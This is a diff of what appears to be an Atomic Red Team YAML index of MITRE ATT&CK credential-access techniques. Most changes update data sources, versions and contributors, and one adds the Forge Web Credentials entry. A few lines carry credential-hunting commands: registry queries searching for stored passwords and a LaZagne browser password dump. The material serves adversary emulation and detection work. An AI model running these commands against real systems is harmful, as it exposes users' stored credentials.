Exabeam + - Sylvain Gil, Exabeam + - RedHuntLabs, @redhuntlabs + x_mitre_permissions_required: + - User x_mitre_detection: 'Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User Data\Default\Login Data. Monitor file read events of web browser files 
@@ -19038,18 +1061,12 @@ credential-access: reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).' - x_mitre_permissions_required: - - User - x_mitre_contributors: - - Ryan Benson, Exabeam - - Barry Shteiman, Exabeam - - Sylvain Gil, Exabeam - - RedHuntLabs, @redhuntlabs - x_mitre_data_sources: - - File monitoring - - API monitoring - - PowerShell logs - - Process monitoring + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Linux + - macOS + - Windows identifier: T1555.003 atomic_tests: - name: Run Chrome-password Collector @@ -19136,6 +1153,24 @@ credential-access: command: "#{lazagne_path} browsers\n" T1552.002: technique: + created: '2020-02-04T12:58:40.678Z' + modified: '2020-02-07T20:49:18.834Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + type: attack-pattern + id: attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580 + description: |- + Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons. + + Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials) + + * Local Machine Hive: reg query HKLM /f password /t REG_SZ /s + * Current User Hive: reg query HKCU /f password /t REG_SZ /s + name: Credentials in Registry + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1552.002 
@@ -19144,46 +1179,28 @@ credential-access: description: netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018. source_name: Pentestlab Stored Credentials - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Credentials in Registry - description: |- - Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons. - - Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials) - - * Local Machine Hive: reg query HKLM /f password /t REG_SZ /s - * Current User Hive: reg query HKCU /f password /t REG_SZ /s - id: attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-02-07T20:49:18.834Z' - created: '2020-02-04T12:58:40.678Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - Ability to query some Registry locations depends on the adversary's level - of access. User permissions are usually limited to access of user-related - Registry keys. 
- x_mitre_permissions_required: - - Administrator - - User + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Sudhanshu Chauhan, @Sudhanshu_C + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Access' x_mitre_detection: Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - x_mitre_contributors: - - Sudhanshu Chauhan, @Sudhanshu_C - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - Administrator + - User + x_mitre_system_requirements: + - Ability to query some Registry locations depends on the adversary's level + of access. User permissions are usually limited to access of user-related + Registry keys. + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' identifier: T1552.002 atomic_tests: - name: Enumeration for Credentials in Registry @@ -19278,12 +1295,15 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-24T20:46:23.547Z' + modified: '2021-04-22T20:20:14.595Z' created: '2020-02-11T18:45:34.293Z' x_mitre_contributors: + - ExtraHop - Vincent Le Toux x_mitre_data_sources: - - Windows event logs + - 'Active Directory: Active Directory Object Access' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_permissions_required: - Administrator x_mitre_detection: |- 
@@ -19375,12 +1395,15 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-08-26T14:16:48.125Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:10:26.613Z' created: '2020-02-11T19:05:02.399Z' x_mitre_data_sources: - - Authentication logs - - API monitoring - - DLL monitoring + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' x_mitre_permissions_required: - Administrator x_mitre_detection: "Monitor for calls to OpenProcess that can be @@ -19397,7 +1420,7 @@ credential-access: used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). " - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows @@ -19452,10 +1475,6 @@ credential-access: on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen. - x_mitre_data_sources: - - Authentication logs - - Windows Error Reporting - - Process monitoring x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_version: '1.1' 
@@ -19524,10 +1543,11 @@ credential-access: - Teodor Cimpoesu - Sudhanshu Chauhan, @Sudhanshu_C x_mitre_data_sources: - - File monitoring - - Network protocol analysis - - Network device logs - - Process use of network + - 'File: File Access' + - 'File: File Creation' + - 'File: File Modification' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: |- Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located. 
@@ -19538,6 +1558,65 @@ credential-access: - Windows x_mitre_is_subtechnique: false atomic_tests: [] + T1606: + technique: + external_references: + - source_name: mitre-attack + external_id: T1606 + url: https://attack.mitre.org/techniques/T1606 + - source_name: GitHub AWS-ADFS-Credential-Generator + url: https://github.com/damianh/aws-adfs-credential-generator + description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. + Retrieved December 16, 2020. + - description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass + the Cookie. Retrieved April 5, 2019. + url: https://wunderwuzzi23.github.io/blog/passthecookie.html + source_name: Pass The Cookie + - source_name: Unit 42 Mac Crypto Cookies January 2019 + url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ + description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware + Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. + - source_name: Microsoft SolarWinds Customer Guidance + url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State + Cyber Attacks. Retrieved December 17, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Forge Web Credentials + description: |- + Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. + + Adversaries may generate these credential materials in order to gain access to web resources. 
This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) + + Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance) + id: attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-14T14:29:27.631Z' + created: '2020-12-17T02:13:46.247Z' + x_mitre_data_sources: + - 'Logon Session: Logon Session Creation' + - 'Web Credential: Web Credential Creation' + - 'Web Credential: Web Credential Usage' + x_mitre_detection: Monitor for anomalous authentication activity, such as logons + or other user session activity associated with unknown accounts. Monitor for + unexpected and abnormal access to resources, including access of websites + and cloud-based applications by the same user in different locations or by + different systems that do not match expected configurations. + x_mitre_version: '1.1' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - SaaS + - Windows + - macOS + - Linux + - Azure AD + - Office 365 + - Google Workspace + atomic_tests: [] T1056.002: technique: external_references: 
@@ -19593,10 +1672,7 @@ credential-access: x_mitre_contributors: - Matthew Molyett, @s1air, Cisco Talos x_mitre_data_sources: - - PowerShell logs - - User interface - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' x_mitre_permissions_required: - User x_mitre_detection: |- @@ -19696,11 +1772,13 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-31T12:59:10.840Z' + modified: '2020-11-05T16:07:03.779Z' created: '2020-02-11T19:13:33.643Z' + x_mitre_contributors: + - Itamar Mizrahi, Cymptom x_mitre_data_sources: - - Authentication logs - - Windows event logs + - 'Active Directory: Active Directory Credential Request' + - 'Logon Session: Logon Session Metadata' x_mitre_permissions_required: - User x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed @@ -19711,7 +1789,7 @@ credential-access: that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n" - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows @@ -19843,8 +1921,8 @@ credential-access: x_mitre_permissions_required: - User x_mitre_data_sources: - - Process command-line parameters - - Windows event logs + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords 
@@ -19962,17 +2040,12 @@ credential-access: x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_data_sources: - - Windows Registry - - Windows event logs - - User interface - - Process command-line parameters - - Process monitoring - - PowerShell logs - - Loaded DLLs - - Kernel drivers - - DLL monitoring - - Binary file metadata - - API monitoring + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + - 'Process: Process Creation' + - 'File: File Modification' + - 'Process: Process Metadata' x_mitre_detection: 'Detection may vary depending on how input is captured but may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`, `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke), @@ -20068,8 +2141,7 @@ credential-access: x_mitre_contributors: - Praetorian x_mitre_data_sources: - - Authentication logs - - Windows event logs + - 'Active Directory: Active Directory Credential Request' x_mitre_system_requirements: - Valid domain account or the ability to sniff traffic within a domain x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos @@ -20139,11 +2211,9 @@ credential-access: x_mitre_permissions_required: - Administrator x_mitre_data_sources: - - PowerShell logs - - Process monitoring - - File monitoring - - System calls - - API monitoring + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'File: File Access' identifier: T1555.001 atomic_tests: - name: Keychain 
@@ -20175,26 +2245,14 @@ credential-access: name: sh T1056.001: technique: - id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 - description: "Adversaries may log user keystrokes to intercept credentials as - the user types them. Keylogging is likely to be used to acquire credentials - for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) - efforts are not effective, and may require an adversary to intercept keystrokes - on a system for a substantial period of time before credentials can be successfully - captured.\n\nKeylogging is the most prevalent type of input capture, with - many different ways of intercepting keystrokes.(Citation: Adventures of a - Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing - keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), - this focuses solely on API functions intended for processing keystroke data.\n* - Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* - Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) - may provide adversaries with hooks into the operating system of network devices - to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device - Attacks) " - name: Keylogging - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2020-02-11T18:58:11.791Z' + modified: '2020-10-21T01:30:56.227Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + - kill_chain_name: mitre-attack + phase_name: credential-access + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1056.001 
@@ -20210,21 +2268,35 @@ credential-access: url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: collection - - kill_chain_name: mitre-attack - phase_name: credential-access - modified: '2020-10-21T01:30:56.227Z' - created: '2020-02-11T18:58:11.791Z' - x_mitre_platforms: - - Windows - - macOS - - Linux - - Network - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Keylogging + description: "Adversaries may log user keystrokes to intercept credentials as + the user types them. Keylogging is likely to be used to acquire credentials + for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) + efforts are not effective, and may require an adversary to intercept keystrokes + on a system for a substantial period of time before credentials can be successfully + captured.\n\nKeylogging is the most prevalent type of input capture, with + many different ways of intercepting keystrokes.(Citation: Adventures of a + Keystroke) Some methods include:\n\n* Hooking API callbacks used for processing + keystrokes. 
Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), + this focuses solely on API functions intended for processing keystroke data.\n* + Reading raw keystroke data from the hardware buffer.\n* Windows Registry modifications.\n* + Custom drivers.\n* [Modify System Image](https://attack.mitre.org/techniques/T1601) + may provide adversaries with hooks into the operating system of network devices + to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device + Attacks) " + id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4 + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + - 'Process: OS API Execution' + x_mitre_permissions_required: + - Administrator + - root + - SYSTEM + - User x_mitre_detection: 'Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include `SetWindowsHook`, `GetKeyState`, @@ -20233,15 +2305,13 @@ credential-access: keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes.' - x_mitre_permissions_required: - - Administrator - - root - - SYSTEM - - User - x_mitre_data_sources: - - Windows Registry - - Process monitoring - - API monitoring + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + - macOS + - Linux + - Network identifier: T1056.001 atomic_tests: - name: Input Capture 
@@ -20389,10 +2459,10 @@ credential-access: - Eric Kuehn, Secure Ideas - Matthew Demaske, Adaptforward x_mitre_data_sources: - - Windows event logs - - Windows Registry - - Packet capture - - Netflow/Enclave netflow + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Flow' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_permissions_required: - User x_mitre_detection: |- @@ -20425,7 +2495,7 @@ credential-access: description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack, Mitigation, Defense. Retrieved February 21, 2020.' - source_name: ired Dumping LSA Secrets - url: ttps://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets + url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets. Retrieved February 21, 2020. - url: https://github.com/mattifestation/PowerSploit @@ -20444,14 +2514,13 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-24T20:35:42.440Z' + modified: '2021-04-21T21:12:38.361Z' created: '2020-02-21T16:22:09.493Z' x_mitre_contributors: - Ed Williams, Trustwave, SpiderLabs x_mitre_data_sources: - - Process monitoring - - PowerShell logs - - Process command-line parameters + - 'Windows Registry: Windows Registry Key Access' + - 'Command: Command Execution' x_mitre_detection: 'Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. 
@@ -20566,9 +2635,10 @@ credential-access: - Administrator - SYSTEM x_mitre_data_sources: - - Process command-line parameters - - PowerShell logs - - Process monitoring + - 'Process: Process Creation' + - 'Process: Process Access' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_contributors: - Ed Williams, Trustwave, SpiderLabs identifier: T1003.001 @@ -21029,9 +3099,10 @@ credential-access: MiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow. x_mitre_data_sources: - - File monitoring - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Flow' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_permissions_required: - User x_mitre_version: '1.1' @@ -21055,6 +3126,10 @@ credential-access: description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019. url: https://www.secureworks.com/research/skeleton-key-malware-analysis + - source_name: Xorrior Authorization Plugins + url: https://xorrior.com/persistent-credential-theft/ + description: Chris Ross. (2018, October 17). Persistent Credential Theft with + Authorization Plugins. Retrieved April 22, 2021. - url: https://technet.microsoft.com/en-us/library/dn487457.aspx description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. 
@@ -21063,18 +3138,10 @@ credential-access: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Modify Authentication Process - description: "Adversaries may modify authentication mechanisms and processes - to access user credentials or enable otherwise unwarranted access to accounts. - The authentication process is handled by mechanisms, such as the Local Security - Authentication Server (LSASS) process and the Security Accounts Manager (SAM) - on Windows or pluggable authentication modules (PAM) on Unix-based systems, - responsible for gathering, storing, and validating credentials. \n\nAdversaries - may maliciously modify a part of this process to either reveal credentials - or bypass authentication mechanisms. Compromised credentials or access may - be used to bypass access controls placed on various resources on systems within - the network and may even be used for persistent access to remote systems and - externally available services, such as VPNs, Outlook Web Access and remote - desktop. " + description: |- + Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078). + + Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. 
Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. id: attack-pattern--f4c1826f-a322-41cd-9557-562100848c84 type: attack-pattern kill_chain_phases: @@ -21082,15 +3149,20 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-21T02:41:11.743Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-26T20:08:31.712Z' created: '2020-02-11T19:01:56.887Z' + x_mitre_contributors: + - Chris Ross @xorrior x_mitre_data_sources: - - File monitoring - - Authentication logs - - API monitoring - - Windows Registry - - Process monitoring - - DLL monitoring + - 'Logon Session: Logon Session Creation' + - 'Process: OS API Execution' + - 'Process: Process Access' + - 'File: File Modification' + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_detection: "Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification 
@@ -21102,18 +3174,20 @@ credential-access: exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools - such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure - robust, consistent account activity audit policies across the enterprise and - with externally accessible services. (Citation: TechNet Audit Policy) Look - for suspicious account behavior across systems that share accounts, either - user, admin, or service accounts. Examples: one account logged into multiple - systems simultaneously; multiple accounts logged into the same machine simultaneously; - accounts logged in at odd times or outside of business hours. Activity may - be from interactive login sessions or process ownership from accounts being - used to execute binaries on a remote system as a particular account. Correlate - other security systems with login information (e.g., a user has an active - login session but has not entered the building or does not have VPN access)." - x_mitre_version: '1.1' + such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nMonitor + for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: + Xorrior Authorization Plugins)\n\nConfigure robust, consistent account activity + audit policies across the enterprise and with externally accessible services. + (Citation: TechNet Audit Policy) Look for suspicious account behavior across + systems that share accounts, either user, admin, or service accounts. Examples: + one account logged into multiple systems simultaneously; multiple accounts + logged into the same machine simultaneously; accounts logged in at odd times + or outside of business hours. 
Activity may be from interactive login sessions + or process ownership from accounts being used to execute binaries on a remote + system as a particular account. Correlate other security systems with login + information (e.g., a user has an active login session but has not entered + the building or does not have VPN access)." + x_mitre_version: '2.0' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -21123,17 +3197,11 @@ credential-access: atomic_tests: [] T1003.003: technique: - created: '2020-02-11T18:42:35.572Z' - modified: '2020-03-24T20:39:39.949Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - type: attack-pattern id: attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24 description: | Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory) - In addition to looking NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) + In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. 
@@ -21158,6 +3226,12 @@ credential-access: to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest. Retrieved February 3, 2015. source_name: Metcalf 2015 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2020-12-14T23:08:02.782Z' + created: '2020-02-11T18:42:35.572Z' x_mitre_platforms: - Windows x_mitre_is_subtechnique: true @@ -21165,10 +3239,8 @@ credential-access: x_mitre_permissions_required: - Administrator x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - PowerShell logs - - Process monitoring + - 'File: File Access' + - 'Command: Command Execution' x_mitre_system_requirements: - Access to Domain Controller or backup x_mitre_detection: Monitor processes and command-line arguments for program @@ -21414,9 +3486,11 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-21T02:41:11.550Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:00.356Z' created: '2020-10-19T17:58:04.155Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -21425,20 +3499,12 @@ credential-access: Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_platforms: - Network atomic_tests: [] T1040: technique: - created: '2017-05-31T21:30:41.399Z' - modified: '2020-03-25T21:03:49.610Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: credential-access - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: 
@@ -21457,21 +3523,27 @@ credential-access: name: Network Sniffing created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529 - x_mitre_version: '1.1' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-02T17:51:59.236Z' + created: '2017-05-31T21:30:41.399Z' + x_mitre_version: '1.2' x_mitre_data_sources: - - Network device logs - - Host network interface - - Netflow/Enclave netflow - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would - likely need to perform a man-in-the-middle attack against other devices on - a wired network in order to capture traffic that was not to or from the current - compromised system. This change in the flow of information is detectable at - the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. - Detecting compromised network devices is a bit more challenging. Auditing - administrator logins, configuration changes, and device images is required - to detect malicious changes. + likely need to perform a [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) + attack against other devices on a wired network in order to capture traffic + that was not to or from the current compromised system. This change in the + flow of information is detectable at the enclave network level. Monitor for + ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network + devices is a bit more challenging. Auditing administrator logins, configuration + changes, and device images is required to detect malicious changes. x_mitre_permissions_required: - Administrator - SYSTEM 
@@ -21479,6 +3551,7 @@ credential-access: - Linux - macOS - Windows + - Network x_mitre_system_requirements: - Network interface access and packet capture driver x_mitre_is_subtechnique: false @@ -21669,7 +3742,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-06-09T20:46:00.758Z' + modified: '2021-02-09T14:15:25.186Z' created: '2017-05-31T21:30:19.735Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -21699,7 +3772,7 @@ credential-access: processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). - [PowerShell](https://attack.mitre.org/techniques/T1086) scripts also exist + [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information @@ -21720,10 +3793,15 @@ credential-access: processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs." x_mitre_data_sources: - - API monitoring - - Process monitoring - - PowerShell logs - - Process command-line parameters + - 'Process: Process Creation' + - 'Process: Process Access' + - 'Command: Command Execution' + - 'File: File Access' + - 'Windows Registry: Windows Registry Key Access' + - 'Active Directory: Active Directory Object Access' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Process: OS API Execution' x_mitre_contributors: - Vincent Le Toux - Ed Williams, Trustwave, SpiderLabs 
@@ -21846,8 +3924,8 @@ credential-access: modified: '2020-09-16T15:39:59.041Z' created: '2020-02-11T18:38:56.197Z' x_mitre_data_sources: - - Authentication logs - - Office 365 account logs + - 'User Account: User Account Authentication' + - 'Application Log: Application Log Content' x_mitre_permissions_required: - User x_mitre_detection: It is difficult to detect when hashes are cracked, since @@ -21947,11 +4025,14 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-25T20:59:05.209Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:11:55.147Z' created: '2020-02-11T19:05:45.829Z' x_mitre_data_sources: - - File monitoring - - DLL monitoring + - 'File: File Creation' + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_contributors: - Vincent Le Toux x_mitre_permissions_required: @@ -21961,7 +4042,7 @@ credential-access: Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013) - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows 
